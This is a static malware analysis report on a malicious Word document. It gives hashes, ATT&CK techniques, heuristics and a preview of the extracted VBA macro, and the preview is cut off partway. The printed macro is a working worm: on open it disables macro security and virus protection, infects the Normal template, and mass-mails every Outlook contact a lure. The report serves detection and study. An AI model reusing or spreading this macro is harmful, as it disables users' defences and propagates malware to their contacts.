Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 19b3858dd7b503c1…

MALICIOUS

Office (OLE)

37.0 KB Created: 2000-07-14 12:20:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: e020759b2f7b117de9648dbf0e2255fc SHA-1: 45fdaf3bf51b8af505cb6329c22eff4bf0305dd6 SHA-256: 19b3858dd7b503c1901f71390e12bc2b4c93f40b284b3b0b84c6eecd0070af14
328 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing obfuscated VBA macros designed to execute automatically upon opening. The Document_Open macro attempts to modify security settings and document properties, likely as a lure to bypass user security or to prepare the system for further malicious activity. The ClamAV detection of 'Win.Trojan.Psycho-3' and 'Win.Trojan.wmvg-1' strongly suggests a trojan payload.

Heuristics 7

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 24936 bytes
SHA-256: bc8fa991e879976d6da61bf2ac545d38bba04746170732a6520c26df8dba2969
Detection
ClamAV: Win.Trojan.wmvg-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()

On Error Resume Next

With Dialogs(wdDialogFileSummaryInfo)

.Author = Chr(45) + Chr(61) + Chr(68) + Chr(97) + Chr(71) + Chr(111) + Chr(78) + Chr(61) + Chr(45)

.Title = Chr(66) + Chr(108) + Chr(65) + Chr(99) + Chr(75) + Chr(32) + Chr(68) + Chr(97) + Chr(89) + Chr(32) + Chr(86) + Chr(105) + Chr(82) + Chr(117) + Chr(83)

.Subject = Chr(84) + Chr(104) + Chr(105) + Chr(115) + Chr(32) + Chr(105) + Chr(115) + Chr(32) + Chr(97) + Chr(32) + Chr(66) + Chr(108) + Chr(97) + Chr(99) + Chr(107) + Chr(32) + Chr(68) + Chr(97) + Chr(121) + Chr(33)

.Comments = Chr(84) + Chr(104) + Chr(120) + Chr(32) + Chr(116) + Chr(111) + Chr(32) + Chr(67) + Chr(111) + Chr(100) + Chr(101) + Chr(98) + Chr(114) + Chr(101) + Chr(97) + Chr(107) + Chr(101) + Chr(114) + Chr(115) + Chr(46)

.Keywords = Chr(32) + Chr(124) + Chr(32) + Chr(66) + Chr(108) + Chr(97) + Chr(99) + Chr(107) + Chr(32) + Chr(68) + Chr(97) + Chr(121) + Chr(32) + Chr(124) + Chr(32) + Chr(68) + Chr(97) + Chr(71) + Chr(111) + Chr(78) + Chr(32) + Chr(124) + Chr(32) + Chr(73) + Chr(116) + Chr(65) + Chr(108) + Chr(89) + Chr(32) + Chr(124) + Chr(32)

.Execute

End With

If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then

CommandBars("Macro").Controls("Security...").Enabled = False

System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&

End If

If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = "" Then

CommandBars("Tools").Controls("Macro").Enabled = False

Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)

End If

CommandBars("tools").Controls("Customize...").Enabled = False

CommandBars("view").Controls("Toolbars").Enabled = False

CommandBars("view").Controls("Status Bar").Enabled = False

WordBasic.DisableAutoMacros 0

ActiveDocument.ReadOnlyRecommended = False

Application.ScreenUpdating = False

Application.DisplayStatusBar = False

Application.DisplayAlerts = False

UN92 = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines

MM84 = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines

Application.EnableCancelKey = 0

If Left(ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 3), 3) <> "Sub" Then

Set IA14 = ActiveDocument.VBProject.VBComponents.Item(1)

BN71 = True

End If

If Left(NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 3), 3) <> "Sub" Then

Set IA14 = NormalTemplate.VBProject.VBComponents.Item(1)

MT5 = True

End If

If MT5 = True Then

ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\windows\Kernel32.sys"

IA14.CodeModule.AddFromFile ("c:\windows\Kernel32.sys")

IA14.CodeModule.deletelines 1, 4

IA14.CodeModule.replaceline 1, "Sub Document_Close()"

ElseIf BN71 = True Then

IA14.CodeModule.AddFromFile ("c:\windows\Kernel32.sys")

IA14.CodeModule.deletelines 1, 4

End If

whereits = ActiveDocument.FullName

ActiveDocument.SaveAs Environ("WINDIR") & "\free.doc"

DoEvents

ActiveDocument.SaveAs whereits

DoEvents

Set Black_OApp = CreateObject("Outlook.Application")

Set Black_Mapi = Black_OApp.GetNameSpace("MAPI")

For Each Black_AddList In Black_Mapi.AddressLists

If Black_AddList.AddressEntries.Count <> 0 Then

Black_Count = Black_AddList.AddressEntries.Count

For Black_AddListCount = 1 To Black_Count

Set Black_AddListEntry = Black_AddList.AddressEntries(Black_AddListCount)

Set Black_msg = Black_OApp.CreateItem(0)

Black_msg.To = Black_AddListEntry.Address

Black_msg.Subject = "Internet Now FREE, it's the future!!!"

Black_msg.Body = "No more money to surf, NOW it's Free..." + 
... (truncated)